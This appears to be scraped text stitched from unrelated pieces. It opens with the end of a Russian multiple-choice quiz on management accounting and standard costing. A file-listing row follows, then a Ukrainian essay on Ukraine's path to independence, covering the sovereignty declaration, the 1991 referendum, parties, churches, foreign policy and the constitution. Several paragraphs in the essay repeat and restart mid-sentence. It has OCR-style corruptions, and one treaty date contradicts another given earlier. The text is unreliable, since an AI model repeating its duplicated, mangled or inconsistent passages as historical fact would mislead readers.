разрабатываемые в организации документы, связанные с затратами и калькуляцией себестоимости.
2. Любые документы бухучета либо разрабатываемые в организации документы, связанные с затратами и
калькуляцией себестоимости.
3. Данные производственного учета, данные оперативного бухучета.
п.19 Положения по ведению бухгалтерского учета и бухгалтерской отчетности в Российской Федерации
(утверждено приказом Минфина России от 29.07.98 N 34н и вступило в силу с 1 января 1999 г.)
Вопрос 6. Верно ли утверждение, что система «стандарт-кост» наиболее эффективна при использовании
гибких бюджетов:
1. Нет.
2. Да.
Вопрос 7. Основным объектом управленческого учета является:
1. Носители затрат (продукт) либо продукция, выпущенная из производства в отчетном месяце, или
«товарный» выпуск продукции, а также незавершенное производство.
2. Место возникновения затрат(цеха).
3. Место возникновения затрат(цеха), носители затрат (продукт) либо продукция, выпущенная из
производства в отчетном месяце, или «товарный» выпуск продукции, а также незавершенное
производство;
Место возникновения-когда издержки производства группируются и учитываются по структурным единицам и
подразделениям,в которых происходит первоначальное потребление производственных ресурсов;носители
затрат-когда издержки производства группируются и учитываются по видам
продукции(работ,услуг),предназначенным для реализации на рынке
Вопрос 8. Какой вариант нормативного учета затрат может выбрать организация:
1. Вариант по форме № 4
2. Вариант по форме №1
3. Существует один нормативный метод и никакой более.
Вопрос 9. Система учета по центрам ответственности необходима в условиях:
1. только стандартного
2. только нормативного
3. Либо нормативного, либо стандартного.
Вопрос 10. Преимущества использования системы «стандарт-кост» состоят в том, что она:
1. Осуществляет контроль деятельности предприятия.
2. Осуществляет планирование и контроль деятельности предприятия.
3. Осуществляет планирование деятельности предприятия.
Вопрос 11. Первым в процедуре оперативного планирования:
1. Бюджет доходов и расходов
2. План производства
3. План продаж
4. Бюджет инвестиций (План капитальных затрат)
5. Бюджет движения денежных средств (План денежных потоков)
Виды бюджетов
Вопрос 12. Центры финансовой отчетности - это:
1. структурные единицы предприятия, для которых формируются планы и которые отчитываются за
результаты их выполнения
2. структурные единицы предприятия, которые отчитываются за остаток наличных денежных средств
См. Бюджет движения денежных средств
Вопрос 13. Центр ответственности представляет собой:
1. Структурные подразделения, которым выделены в определенные полномочия и ответственные за
принятие решений.
2. Структурные подразделения, ответственные за принятие решений.
3. Структурные подразделения, которым выделены в определенные полномочия.
Вопрос 14. Нормативными являются затраты:
1. учитываемые по нормам потребляемого ресурса.
2. учитываемые по нормам или нормативным значениям потребляемого ресурса.
3. учитываемые по нормам.
/////////////////////////
Вопрос 140. В качестве носителя затрат могут выступать:
1. рабочее место;
2. предприятие;
3. продукт (услуга);
4. цех; |
https://doc4web.ru/istoriya/nacionalnoderzhavne-vidrodzhennya-ukr-narodu.html | Національно-державне відродження укр народу | https://doc4web.ru/uploads/files/120/defd90b903a180fb9c81ba2679cd77fe.docx | files/defd90b903a180fb9c81ba2679cd77fe.docx | 1.Передумова державного відродження України : а ) Причини та суть кризових явищ в економічному та духовному житті суспільства .
Післяхрущовське двадцятиріччя(1965–1985)нерідко називали періодом“застою ” , кризою системи . Д ва десятилітя “застою” харектиризувална міжнародній арені суперництвом двох воєнно-політичних блоків -
НАТО та ОВД .Відносини між ними інколи пом’якшувались, інколи загострювались. Вони мали форму воєнного, економічного, політичного протистояння.На23 зїзді КПРС у березні 1966р. Узяв курс на жорсткішу, ніж за часів Хрущова М. Зовнішню політику. Економічні ресурси СРСР мали спрямовуватися передусім на досягненняя воєнно-стратегічного паритету з країнами НАТО. Ставилося навіть перевищити ці країни за якістю та кількістю озброєнь. Справді, економічні показники в ці роки, за винятком «золотого» (1966—1970) п'ятиріччя, знижувалися. Економічна реформа, яка була започаткована у березні і вересні на пленумах ЦК КПРС (1965), була прискорена партійно-державною бюрократією, її початковий розмах поступово слабшав. Глибока структурна перебудова економіки була необхідністю, але вона не здійснювалася. Як і раніше, в народному господарстві домінувала важка промисловість. Кращі кадри працювали на оборонних підприємствах. Ці підприємства поглинали кращу сировину, їх обслуговували високо кваліфіковані кадри та вчені. А тим часом на підприємствах цивільних галузей швидко старіли основні виробничі фонди, і на їх оновлення кошти не виділялися. Україна перетворилася на полігон для економічних експериментів центральних відомств, в результаті яких великі райони республіки стали зоною екологічного лиха. Концентрація в Україні атомних електростанцій, побудованих за недосконалими проектами, досягла критичного рівня.
Колгоспно-радгоспна система в 70—80-х роках продемонструвала свою повну неефективність. Аграрний сектор економіки поглинав величезні матеріальні ресурси, а його продуктивність знижувалася. Науково-технічна революція мало торкнулася сільського господарства України. Для забезпечення населення продовольством держава мусила в широких масштабах закуповувати зерно за кордоном. Українське село занепадало. Сотні тисяч гектарів найродючіших земель були виведені з господарського обігу. В 1972—1986 рр. з карти України зникло півтори тисячі сіл. Цьому штучному процесові не було ні економічного, ні соціального виправдання.
Народна освіта - підґрунтя культури й духовності — в 60-80-х роках перебувала в стані жорсткої політизації, пристосування до потреб «комуністичного будівництва».
У 1966—1967 рр. у школах республіки розпочався перехід на нові навчальні програми, який планувалося завершити за 10 років. Окрім нових розділів фізики й загальної біології, свого часу заборонених (кібернетика, генетика), було запроваджено курси філософії та політекономії соціалізму, об'єднані в спеціальний предмет — суспільствознавство, у восьмих класах було введено новий курс «Основи Радянської держави і права».
У 1972 р. ЦК КПРС і Рада Міністрів СРСР прийняли спільну постанову «Про завершення переходу до загальної середньої освіти молоді і дальший розвиток загальноосвітньої школи». Зазначений документ, а також прийняті в 1973 р. «Основи законодавства СРСР та союзних республік про народну освіту» визначили основні напрями навчального процесу в наступні роки. Їх прийняття означало, що віднині завданням шкіл та прирівняних до них закладів е надання середньої освіти кожному громадянинові України, незалежно від його бажання і здібностей. Запровадження обов'язкової загальної освіти вимагало значних зусиль і коштів для реалізації.
Гучні заяви про охоплення всієї молоді середньою школою негативно вплинули на якість навчання. Було запроваджено жорсткі критерії оцінки роботи навчальних закладів за кількісними показниками. Велася активна боротьба з другорічництвом, за збереження учнівського контингенту. Обов'язковість середньої освіти вела до знецінення знань, окозамилювання, оскільки високу оцінку керівництва міг дістати тільки той педагог, учні якого мали високі оцінки. Заробітна плата вчителів була низькою.
Особливий акцент у 60—80-х роках робився на трудовому вихованні учнівської молоді. Учні мусили оволодіти робітничими та сільськогосподарськими спеціальностями.
Антигуманною була акція із закриття, особливо у сільській місцевості, малокомплектних початкових і восьмирічних шкіл. У 60-х роках кількість загальноосвітніх шкіл у республіці зменшилася на 3160, у 1980 р. в Україні їх було 20935, що майже на 9,3 тис. менше, ніж у 1960 р.
Політична еволюція в Україні. Прийняття Верховною Радою УРСР “Декларації про системи в Україні ”
15Травня 1990 р. в Києві вперше як постійний парламент розпочала роботу Верховна Рада УРСР нового скликання. Ця подія надала нового імпульсу всьому політичному життю республіки. "Ідея незалежності України, яка нещодавно вважалась «антинародною», «націоналістичною», а значить і злочинною, на повний голос зазвучала у стінах парламенту. До Верховної Ради вперше потрапили політики, безмежно віддані справі національного відродження, готові відстоювати її в гострій парламентській боротьбі.
Приклад цього подавали інші союзні республіки. В 1988-1990 рр. декларації про державний суверенітет прийняли Естонія, Латвія та Литва. 12 червня 1990 р., з ініціативи Б. Єльцина, Декларацію про державний суверенітет прийняла Верховна Рада Російської Федерації. Це була відповідь на прагнення М. Горбачова реанімувати вплив союзних органів влади.
Ситуація, що складалася, надихнула українських парламентарів наприкінці червня 1990 р. поставити питання про правове закріплення державного суверенітету України.
Саме в цей час у Москві відкрився XXVIII з'їзд КПРС. 63 народних депутати України були обрані його делегатами. 5 липня 1990 р. від імені парламентської опозиції В. Чорновіл запропонував їм повернутись до Києва і взяти участь в роботі вищого законодавчого органу України, який в цей час обговорював питання державного суверенітету. Цю пропозицію підтримала більшість депутатів Верховної Ради Української РСР. Вперше позиція і більшість виступили солідарно.
Основна частина делегатів XXVIII з'їзду КПРС виконала вимогу Верховної Ради і повернулась до Києва. Однак 9 липня, у зв'язку з майбутнім призначенням на посаду заступника генерального секретаря ЦК КПРС, подав у відставку Голова Верховної Ради України В. Івашко. При цьому він мотивував своє рішення тим, що не бачить у Верховній Раді «надійної опори для здійснення програми економічного, соціального та культурного відродження України».
Внаслідок відставки В. Івашка прокомуністична більшість парламенту залишилась без керівництва, що створило умови для переходу опозиції в наступ і активної роботи щодо прийняття документа про державний суверенітет республіки.
б) Політична еволюція в Україні . Прийняття Верховною Радою УРСР “Декларації про державний суверенітет в Україні”. Вперше, партійно-державне керівництво республіки зважилося на крок, який «не вписувався» в настрої, а тим паче у політику центру. 16 липня 1990 р. поіменним голосуванням Верховна Рада Української РСР прийняла історичного значення документ –“ Декларацію про державний суверенітет України”. Цьому сприяли, перш за все, настрої широких мас, а також зверхня, великодержавна політика імперського центру, що грубо ігнорував інтереси союзних республік і своїми діями сприяв дальшому поглибленню економічної кризи. Важливе значення мав приклад Російської Федерації, народні депутати якої, всупереч сподіванням «інтернаціоналістів», пішли на проголошення державного суверенітету РРФСР.
Державний суверенітет України Декларація характеризувала як «верховенство, самостійність, повноту і неподільність влади республіки в межах її території та незалежність і рівноправність у зовнішніх зносинах». Це найголовніше положення Декларації, започаткувало рішучий злам системи усталених відносин між Україною і союзним центром. Вона формувалась десятиріччями і передбачала верховенство законів СРСР над законами усіх союзних республік, в тому числі УРСР, підпорядкованість усіх законодавчих і виконавчих органів України союзним структурам. «Українська РСР самостійна у вирішенні будь-яких питань свого державного життя», - так сформульовано в Декларації основний принцип державотворення в республіці.
Розділ «Економічна самостійність» проголошував: «Земля, її надра, повітряний простір, водні та інші природні ресурси... весь економічний і науково-технічний потенціал, що створений суверенітету республіки і використовується з метою забезпечення матеріальних і духовних потреб її громадян». Дане положення відкривало перспективи повернення українському народові його багатств: заводів, фабрик, копалень, електростанцій тощо. Багатообіцяючою була й теза про те, що «Українська РСР забезпечує захист всіх форм власності».
Підкреслювалась необхідність створення власних банків, проведення самостійної фінансової, митної і податкової політики, формування Державного бюджету, а в разі потреби і впровадження власної грошової одиниці.
Декларація передбачала також такі неодмінні складові суверенітету, як «безпосередні зносини з іншими державами» шляхом укладення з ними дипломатичних і консульських відносин, а також право на власні Збройні сили. Проголошувався намір України у майбутньому стати нейтральною, позаблоковою, без'ядерною державою.
Декларації про державний суверенітет України не було надано статусу конституційного акта. Численні звернення опозиції до Верховної Ради УРСР з вимогою зважитися на це, відкидалися більшістю депутатів. Це означало, що Декларація залишалася стратегією на майбутнє. У цьому проявлялася нерішучість і половинчастість парламентської більшості, котра не хотіла йти на повний розрив із центром.
Але та ж більшість — і це її безперечно мужній крок — погодилася на внесення до Конституції УРСР статті, яка проголошувала верховенство законів Української РСР на її території над союзними законами. Інше важливе рішення — прийняття 3 серпня 1990 р. Закону УРСР про економічну самостійність України. Закон проголошував принцип «власності народу республіки на її національне багатство і національний доход». Будь які дії, що суперечили цьому принципу, оголошувалися протизаконними і заборонялися. Це було винятково важливо для наповнення положень Декларації реальним змістом.
Після прийняття Декларації відбулися вибори нового Голови Верховної Ради. Перемогу здобув 56-річний другий секретар ЦК Компартії України Леонід Кравчук. Виходець з Рівненщини, батько якого загинув на фронті, а мати все життя пропрацювала в колгоспі, він зумів успішно закінчити Кооперативний технікум, Київський університет та Академію суспільних наук, стати кандидатом економічних наук. З 1960 р. займається партійною роботою, пройшовши шлях від консультанта методиста Будинку політосвіти обкому до другого секретаря ЦК КП України. Компартійне минуле на початковому етапі викликало до нього недовіру національно-демократичної опозиції. На-:1юдові ж запам'ятались дискусії, які Л. Кравчук вів з ініціатором прийняття Декларації відбулися вибори нового Голови Верховної Ради. Перемогу здобув 56-річний другий секретар ЦК Компартії України Леонід Кравчук. Виходець з Рівненщини, батько якого загинув на фронті, а мати все життя пропрацювала в колгоспі, він зумів успішно закінчити Кооперативний технікум, Київський університет та Академію суспільних наук, стати кандидатом економічних наук. З 1960 р. займається партійною роботою, пройшовши шлях від консультанта методиста Будинку політосвіти обкому до другого секретаря ЦК КП України. Компартійне минуле на початковому етапі викликало до нього недовіру національно-демократичної опозиції. На-:1юдові ж запам'ятались дискусії, які Л. Кравчук вів з ініціаторами створення Народного руху , тимчасом як інші парт керівники не наважувались це робити .
Перша сесія Верховної Ради тривала майже 2 місяці, а не 2-3 дні як це було раніше, її засідання вперше в прямому ефірі транслювались по радіо та телебаченню, викликаючи активне обговорення в суспільстві. Саме Верховна Рада як вищий орган законодавчої влади в республіці стала основною ареною політичної боротьби і прийняття доленосних рішень.
в)Кроки на шляху політичної реформи демократизації . Формування багатопартійної системи в Україні .
Загострення економічної кризи пришвидшувало реформи в політичній системі . Існуючі державні інститути були вже неспроможні уберегти країну від занепаду. Ця істина оволодівала свідомістю ініціаторів перебудови й спонукала їх до демократизації спільного життя , відмови від так званої керівної ролі КПРС у суспільстві. Очікувалося, що це розв'яже ініціативу громадян і сприятиме створенню стабільної соціально-економічної й політичної системи в рамках «оновленого» соціалізму.
Але, як уже бувало в історії, наміри керівництва демократизувати тоталітарну систему наштовхувалися на жорсткий опір консервативних елементів владних структур, які не бажали втрачати свого становища і пов'язаних з ним привілеїв. Політична реформа буксувала, бо закони Верховної Ради СРСР були половинчасті, приймалися із запізненням, а часто-густо не виконувалися. Серед населення наростали розчарування, зневіра у здатність керівництва вивести країну з кризи. Вплив і авторитет КПРС та державних владних структур швидко й не-зворотно падав.
Утворення Руху як масової громадсько – політичної організації поклало край монополії КП України почалося формування багатопартійності. Цей процес активізувався після лютневого (1990) пленуму ЦККПРС , який під тиском обставин погодився вилучити з Конституції СРСР сумнозвісну статтю 6, що закріплювала керівну роль партії в радянському суспільстві.
За короткий час про початок своєї діяльності заявили Українська національна партія (УНП), Демократична партія України (ДемПУ), Партія зелених України (ПЗУ), Соціал-демократична партія України (СДПУ), Об'єднана соціал-демократична партія України (ОСДПУ) та ін.
Поява нових політичних партій відбувалася одночасно із наростанням внутрішніх суперечностей у Компартії України. У січні 1990 р. було заявлено про створення Демократичної платформи. Головною своєю метою вона проголосила перетворення КПРС на демократичну партію парламентського типу. Дем-платформа виступала також за перетворення КПРС на союз компартій республік, за ліквідацію її унітарного характеру. Впевнившись у неможливості демократизації КП України, Дем-шіатформа виділилася в окрему політичну партію - Партію демократичного відродження України (ПДВУ).
Вибори до Верховної Ради УРСР у березні 1990 р. продемонстрували посилення впливу опозиції та послаблення авторитету і можливостей КП України. Незважаючи на нерівні умови, відсутність доступу до засобів масової інформації, опозиція, об'єднавшись у Демократичний блок, здобула майже третину місць у Верховній Раді. Згодом депутати від Демблоку оформились в опозиційну Народну Раду.
2.Прийняття Верховною Радою України 24 серпня 1991 року Акту проголошення незалежності України . Всеукраїнський референдум 1 грудня 1991 року про державну незалежність та вибори президента України .
24 серпня 1991 р. відкрилася позачергова сесія Верховної Ради України, на якій було розглянуто питання про політичну ситуацію в республіці та прийнято низку надзвичайно важливих документів.
Серед них — Постанова та Акт проголошення незалежності України, затверджені конституційною більшістю (Постанова: за — 321, Акт: за — 346). У результаті Україна стала незалежною демократичною державою з неподільною та недоторканою територією, на якій чинними є лише власні Конституція, закони та постанови уряду.
З метою всенародного підтвердження Акта сесія вирішила провести 1 грудня республіканський референдум.
Одностайність підтримки Акта проголошення незалежності України свідчила не стільки про перехід парламентської більшості на самостійницькі позиції, хоч без урахування історичної реальності і волі народу тут не обійшлось, скільки про деморалізацію прокомуністичних елементів за умов поразки перевороту, про спробу ціною паперової незалежності врятувати компартію, про тактику поступки у гаслах з метою подальшого вихолощення змісту цих гасел. Водночас частина комуністичної номенклатури дійшла висновку, що в нових умовах її груповим інтересам більше відповідає незалежна Україна, і зробила свідомий вибір на користь самостійності.
Проголошення державної незалежності Україною та іншими республіками викликало неоднозначну реакцію в Росії. 26 серпня прес-секретар Президента РРФСР від імені Б. Єльцина заявив, що Російська Федерація не ставить під сумнів конституційне право кожного народу на самовизначення, але у випадку припинення союзницьких відносин залишає за собою право поставити питання про перегляд кордонів. На прес-конференції 27 серпня у Києві Л. Кравчук нагадав, що згідно з договором між Росією і Україною від 19 листопада 1990 р. сторони визнали неприпустимість перегляду кордонів і Україна має намір твердо дотримуватись цієї угоди.
Обурення демократичної громадськості Росії та народу України, а також безкомпромісна, але виважена позиція керівництва республіки призвели до термінового (28 серпня) приїзду у Київ державної делегації РРФСР на чолі з віце – президентом О. Руцьким . В результаті дводенних переговорів було прийняте комюніке , в одному з пунктів якого підтверджувалась закріплена договором від 19 листопада 1991 р. , територіальна цільність сторін .
Поступово світ призвичаювався до існування самостійної Української держави. Але повне її визнання провідні країни відклали до референдуму на підтвердження Акту про незалежність.
1 грудня 1991 р. на виборчі дільниці прийшло близько 32 млн. громадян. З них майже 29 млн. (90,35%) підтвердили Акт проголошення незалежності України. За ходом референдуму спостерігали представники державних органів, політичних партій і рухів, держав колишнього СРСР і зарубіжних країн, міжнародних організацій, українські та іноземні журналісти.
Звичайно, було б ілюзією вважати, що 90,35% громадян України за короткий час стали свідомими самостійниками. Основна маса населення або проголосувала з надією на краще життя в незалежній Україні, або просто довірилась авторитетові Верховної Ради та її Голови. Однак незалежно від мотивів воля народу була виявлена чітко й однозначно.
На урочистому засіданні 5 грудня 1991 р. Верховна Рада України прийняла звернення "До парламентаріїв і народів світу", в якому наголошувалося, що договір 1922 р. про утворення СРСР Україна вважає стосовно себе недійсним і недіючим. Заявлялось, що Україна будує демократичну, правову державу, першочерговою метою якої є забезпечення прав і свобод людини. Підтверджувалися положення Декларації прав національностей України від 1 листопада 1991 р. щодо гарантування усім народам і громадянам республіки рівних політичних, громадянських, економічних, соціальних та культурних прав. Проголошувався перехід до ринкової економіки, визнавалася рівноправність усіх форм власності. Висловлювалася готовність до активізації міжнародного співробітництва на засадах рівноправності, суверенності, невтручання у внутрішні справи один одного, визнання територіальної цілісності і непорушності існуючих кордонів. Неподільною і недоторканою Україна оголосила і власну територію, водночас не маючи територіальних претензій до будь-якої держави. Задекларовано було також без'ядерний статус республіки, оборонний характер її військової доктрини, формування Збройних Сил на засадах мінімальної достатності.
19—21 серпня 1991 р. в СРСР було здійснено невдалу спробу державного перевороту. Одразу після провалу путчу почався стрімкий процес розпаду країни. Республіки заявили про свій вихід, із Союзу, було проголошено ряд актів і декларацій
24 серпня 1991 р. Верховна Рада УРСР при незалежності України», що проголосив Україну незалежною державою. Було прийнято рішення про проведення всеукраїнського референдуму на підтвердження Акту проголошення незалежності України та призначено вибори Президента України . Про Значущість референдуму свідчить звертання Верховної Ради України до народу: «Цей вибір для себе, для своїх дітей і онуків, для майбутніх поколінь. Ми не маємо права помилитися... тому що в наших руках доля молодої незалежної держави і доля Батьківщини, рідної землі».
В умовах гострої політичної боротьби, зростання національної самосвідомості української-нації, збільшення прихильників ідеї національного відродження й суверенітету України, наростання економічної кризи 1 грудня 1991 року відбулися референдум і вибори Президента України..
До бюлетеня для голосування було включено шість кандидатів: В. Гребньов, Л. Кравчук, Л. Лук'яненко, Л. Табурянський, В. Чорновіл, І. Юхновський. За Л. Кравчука проголосувало 61,8 % виборців, і Голова Верховної Ради України Леонід Макарович Кравчук став Першим Президентом України.
На референдумі понад 90 % громадян України проголосували за «Акт проголошення незалежності України», незважаючи на те, що на референдумі СРСР 17 березня 1991 р. 70 % населення України висловилося за збереження єдності СРСР .
3.Соціал – економічні, політичні, духовні процеси в Україні в 90–х 2000 – х рр.
Утвердження політичної незалежності неможливе без створення стабільної, високоефективної національної економіки, зорієнтованої на задоволення повсякденних потреб людей.
Погіршення ж економічного становища в умовах соціальне політичної нестабільності неминуче ставить під загрозу її державність.
Власну життєздатну економічну систему України доводилося створювати на руїнах загальносоюзного економічного комплексу СРСР. З'єднати ці розрізнені «обрубки» колись могутніх союзник відомств, вдихнути в них життя, сформувати на їхній основі комплексну, цілісну й гармонійну національну економіку можливе було за умови вирішення кількох фундаментальних проблем.
По-перше, необхідно було докорінно реформувати економік} на ринкових засадах, роздержавити її, провести приватизацію, сформувати багатоукладну економіку, забезпечити рівноправні умови для розвитку всіх її форм власності - державної, приватної, колективної.
По-друге, слід було розгорнути структурну перебудову промисловості України. І перш за все — подолання її однобічної орієнтації на важку індустрію; ліквідацію затратного характеру виробництва шляхом впровадження ресурсозбереження, новітніх технологій, досягнень науково-технічної революції; всебічну переорієнтацію економіки на задоволення соціальних потреб. Принцип «виробництво заради виробництва», на якому ґрунтувалося функціонування радянської економіки, повинен був поступитися місцем принципу «виробництво заради людей».
По-третє, потрібно на ринкових засадах створити ефективну систему економічної кооперації як в Україні, так і з державами близького і далекого зарубіжжя. Ця нова природна система економічної кооперації повинна була компенсувати розрив штучних, нав'язаних центром економічних зв'язків
України з Росією та іншими республіками колишнього СРСР. Демократичні процеси в суспільстві, крах комуністичної ідеології сприяли відродженню релігійного життя, розширенню ролі церкви формуванні духовності народу України проголошення незалежності активізувало в Російській право славній церкві в Україні ті сили, які прагнули відокремлення від Московського патріархату й консолідації православ'я на автокефальних засадах, розбудови в суверенній країні помісної церкви. Вони обґрунтовували свою позицію тим, що християнство на Русі започатковано в Києві у X ст., а самостійна українська держава мусить мати н залежну від Москви церкву, як було до кінця XVII ст.
Виходячи з цього, частина духовенства УПЦ та УАПЦ доходить згоди щодо необхідності об'єднання двох православних церков. У червні 1992 р. відбувся об'єднавчий собор. Патріархом Української православної церкви Київського патріархату (УПЦ-КП - так вона стала називатися після об'єднання) було обрано Мстислава (Скрипника), а його заступником - Філарета (Денисенка).
Та єдина православна церква в Україні не склалася. По-перше, об'єднавчий собор викликав незадоволення Московського патріархату, який не хотів змиритися із втратою однієї з найвпливовіших і найбагатших церков. Спекулюючи на традиційні Демократичні процеси в суспільстві, крах комуністичної ідеології сприяли відродженню релігійного життя, розширенню ролі церкви формуванні духовності народу України. Проголошення незалежності активізувало в Російській право славній церкві в Україні ті сили, які прагнули відокремлення
від Московського патріархату й консолідації православ'я на автокефальних засадах, розбудови в суверенній країні помісної церкви. Вони обґрунтовували свою позицію тим, що християнство на Русі започатковано в Києві у X ст., а самостійна українська держава муситьмати незалежну від Москви церкву, як було до кінця XVII ст.
Виходячи з цього, частина духовенства УПЦ та УАПЦ доходить згоди щодо необхідності об'єднання двох православних церков. У червні 1992 р. відбувся об'єднавчий собор. Патріархом Української православної церкви Київського патріархату (УПЦ-КП - так вона стала називатися після об'єднання) було обрано Мстислава (Скрипника), а його заступником - Філарета (Денисенка).
Та єдина православна церква в Україні не склалася. По-перше, об'єднавчий собор викликав незадоволення Московського патріархату, який не хотів змиритися із втратою однієї з найвпливовіших і найбагатших церков. Спекулюючи на традиційних уподобаннях зрусифікованої частини віруючих, прихильники Московського патріархату зуміли взяти під свій контроль більшість українських парафій. Українську православну церкву Московського патріархату (УПЦ-МП) очолив митрополит Володимир (мирське ім’я В. Сабадан).
По-друге, не визнав об'єднання, хоча номінальне очолював й УПЦ-КП, 92-річний Мстислав, за яким пішла частина автокефалістських парафій.
Після смерті Мстислава 1993 р. розкол поглибився. Його закріпив собор УАПЦ і обрання на ньому патріархом Димитрія (в миру - В. Ярема). До того він очолював одну з автокефалістських громад Львова.
У свою чергу, на соборі УПЦ-КП на звільнений після смерті Мстислава патріарший престол у жовтні 1993 р. було обрано Володимира (Романюка) - відомого богослова, видатного українського правозахисника. Його заступником став згадуваний митрополит Філарет (Ценисенко).
Таким чином, українське православ'я виявилося розколотим на основні три гілки, що негативно впливало на міжконфесійні стосунки та духовне життя в цілому.
В західних областях розширювався вплив Української греко-католицької церкви (УГКЦ) на чолі з Мирославом Іваном кардиналом Любачівським, котра об'єднувала 2,9 тис. громад. Активно діяло також близько 600 громад римсько-католицької церкви.
Кінець 80-х - початок 90-х років характеризувався зростанням впливу на релігійне життя республіки сектантства: євангельських християн-баптистів, Свідків. Єгови, адвентистів сьомого дня тощо. Поряд із християнською релігією в Україні існують іудаїзм [ та іслам. Громади вірних цих релігій активно діють у Києві, Одесі, Криму, Львові та інших містах. У республіці з'являються прихильники РУН-віри (Рідної української національної віри). Зорганізована в середовищі української еміграції, ця релігійна І течія ґрунтується на дохристиянських віруваннях слов'ян, стоїть на позиціях активного національного відродження. Усього в Україні в першій половині 90-х років функціонувало понад 70 різних релігійних конфесій.
Наявні міжконфесійні суперечності не гальмують активізації релігійного життя народу України, який через релігію повертає собі втрачені духовні й морально-етичні орієнтири. Мільйони людей уже зробили свій вибір. Протягом 1991-1995 рр. свій статус оформили понад 6 тис. релігійних громад. В Україні відроджено та засновано близько 40 нових монастирів, 10 духовних семінарій і училищ, 2 духовні академії, 3 тис. храмів.
Справжня, а не декларована свобода совісті стала важливим елементом життя України, духовності українського народу, його національного відродження.
4.Становлення багатопартійності системи незалежності України .
Необхідною умовою становлення України як демократичної правової держави є багатопартійність.
Причини встановлення багатопартійності: зростання політичної активності народу, послаблення політичної активності народу , послаблення політичної та ідеологічної цензури, розвиток національної самосвідомості, ліквідація економічного монополізму держави, поява нових суспільних груп на базі нових форм власності. Загалом багатопартійність стала реакцією суспільства на занепад однопартійної моделі розвитку політичної системи, пошуком шляхів виходу з політичної те ідеологічної кризи.
Динаміка зростання політичних партій: у 1990 р. виникає 1 політична партія, у 1991 р. — ще 5, у 1992 р. — 7,. у1993 р — 15;. у 1995 р. — З, у 1996 р. — 5, у 1997 р. — 10 партій. На 1січня 1998 р. в Україні була 51 політична партія. Зараз їх більше 100, вони претендують повний спектр напрямків — від екологічних до релігійних, від демократичних до авторитарних.
Перший етап установлення багатопартійності в Україні почався в 1988 р. з виникнення опозиційних до КПРС рухів.Головним завданням демократичних сил було створення широкого об'єднання за типом народного фронту. Восени 1988 р. діяв ряд самостійних об'єднань(«Народний Рух України за перебудову» тощо).
Другий етап: 1989 р. — перший місяць 1990 р. Характеризується створенням багатьох партій, об'єднанням представників різних поглядів; поділ на «центр» та «радикалів». Межа закінчення другого й початку третього етапу припала на березень-квітень 1990 р коли відбулися вибори до Верховної Ради УРСР. За їх результатами демократичний блок України, у якому Рух був головною силою, створює парламентську опозицію — Народну Раду.
Партії поділяються на три групи: праві, ліві й центристські. До правих належать партії націонал-демократичного спрямування, в основі політики яких лежить демократичній націоналізм. До центристських належать партії соціал-демократичного спрямування з ліберальною ідеологією. До лівих належать партії комуністичної та соціалістичної орієнтації, їхня ідеологія — марксизм-ленінізм.
5.Україна в сучасному світі .
Самостійну зовнішню політику Україна стала проводити після проголошення незалежності. Принципи зовнішньої політики країни були викладені в Декларації про державний суверенітет (1990 р.) та документі Верховної Ради “Основні напрямки зовнішньої політики України “ (1993 р.).
Україна активізувала свою зовнішньополітичну діяльність у міжнародних організаціях: ЮНЕСКО, МАГАТЕ, МОП, Всесвітній організації охорони здоров'я, Союзі електрозв'язку. З 1972 р. Україна бере участь у програмі ООН з охорона навколишнього середовища — ЮНЄП.
Україна має 5 постійних представництв у міжнародних організаціях, е членом більш як 40 міжнародних і міжурядових організацій.
9 листопада 1995 р. Україна стала членом Ради Європи і пов'язує з участю в роботі цієї організації: подальшу інтеграцію до Європи. Постійним представником України в Раді Європи є Олександр Купчишин. Участь делегації України в засіданнях Парламентської Асамблеї Ради Європи (ПАРЄ) покликана сприяти зміцненню демократи та правопорядку в Україні. Наприкінці січня 2001р. в ПАРЄ відбулися слухавня про свободу слова в Україні.
Співпраця України з Організацією європейської безпеки і співробітництва дозволила нашій країні одержати гаранти безпеки, поваги до незалежності й суверенітету, територіальної цілісності з боку Росії, США, Великобританії.
Улітку 1997 р. в Мадриді Україна підписала Хартію про особливе партнерство з Організацією Північноатлантичного Договору (НАТО). Країни НАТО визнали Україну невід'ємною частиною демократичних держав Європи.
Як країна-співзасновник Ради Євроатлантичного партнерства й активний учасник програми «Партнерство заради миру» Україна поглиблює практичне співробітництво з НАТО (проведення спільних операцій і навчань під егідою Ради Безпеки ООН і за відповідальності ОБСЄ). Україна і країни НАТО проводять регулярні консультації з питань регіональної безпеки, запобігання конфліктам, здобуття військової освіти.
Міністр закордонних справ України Геннадій Удовенко був Головою Генеральної Асамблеї ООН.
У 2000—2001 рр. Україна виконувала функції непостійного члена Ради
Безпеки ООН. У березні 2001 р. Україна головувала на засіданнях Ради
Безпеки ООН, що свідчить про високий рівень міжнародного авторітету на
шої держави.
Україна брала активну участь у врегулюванні кризе на Балканах. Україн
ські військові входять до складу міжнародних миротворчих збройних сил.
Український інженерний батальон бере участь у розмінуванні території Лі
вану; українські миротворці у Сьєрра-Леоне сприяють врегулюванню місце
вого міжетнічного конфлікту.
ПІсля терористичних актів 11 вересня 2001 р. у США Україна взяла , актив
ну участь у боротьбі з міжнародним тероризмом.
Україна цілком підтримує концепцію «нової Європи», основою якої є Європейський Союз, Рада Європи та НАТО. Співпраця з цими організаціями е підґрунтям європейського курсу України у новому сторіччі.
6.Прийняття Конституції України – важлива віха її історії.
У 1996 р. була прийнята Конституція України..Конституція — Основний Закон держави. (У перекладі з латинської «конституція» — «установлення», «устрій».)
Україна має давні конституційні традиції. Ще за часів Київської Русі й Галицько-Волинського князівства діяла «Руська Правда». Під час перебування українських земель у складі Литви і Польщі діяли «Литовські Статути» (1529, 1566, 1588 рр.). У роки Національно-визвольної війни під проводом Б. Хмельницького основними правовими актами були універсали гетьмана, а з 1654р. — «Березневі статті», що визначали автономний статус України в складі Московської держави. Наступними актами, що визначали правовий статус України в складі Московської держави, були Переяславські статті, Московські статті, Глухівські статті, Коломацькі статті, «Вирішальні пункти».
Пам'яткою політичної та юридичної думки XVIII ст. стала Конституція Пилипа Орлика «Пакти і Конституція прав і вільностей Війська Запорозького», створена 5 квітня 1710 р.
У XIX ст. конституційне право продовжувало розвиватися. Був створений проект «Конституції Г.Андрузького»; з конституційними проектами наприкінці XIX — на початку XX ст. виступили М. Драгоманов, М. Грушевський.
У роки Національно-демократичної революції 1917—1921 рр. була прийнята, але не набрала чинності «Конституція УНР». Конституційне право поповнилося чотирма Універсалами Української Центральної Ради.
У радянській Україні діяли чотири Конституції — 1919 р., 1929 р., 1937 р., 1978 р.
